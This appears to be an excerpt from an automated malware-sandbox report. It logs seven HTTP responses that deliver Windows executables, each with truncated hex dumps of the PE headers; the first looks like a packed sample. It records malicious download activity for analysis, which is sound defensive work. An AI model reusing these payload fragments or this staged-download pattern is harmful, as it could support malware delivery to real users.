Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 01 Feb 2025 20:36:27 GMTContent-Type: application/octet-streamContent-Length: 3034624Last-Modified: Sat, 01 Feb 2025 20:32:21 GMTConnection: keep-aliveETag: "679e84d5-2e4e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 98 01 00 00 00 00 00 00 00 32 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 30 32 00 00 04 00 00 8b 84 2e 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 a8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 94 df 31 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 44 df 31 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 a8 03 00 00 00 90 06 00 00 04 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 6d 71 65 72 74 7a 6d 69 00 40 2b 00 00 b0 06 00 00 34 2b 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6a 76 73 6e 78 75 74 74 00 10 00 00 00 f0 31 00 00 04 00 00 00 28 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 00 32 00 00 22 00 00 00 2c 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 01 Feb 2025 20:36:37 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 01 Feb 2025 20:36:50 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 01 Feb 2025 20:36:51 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 01 Feb 2025 20:36:52 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 01 Feb 2025 20:36:52 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 01 Feb 2025 20:36:54 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
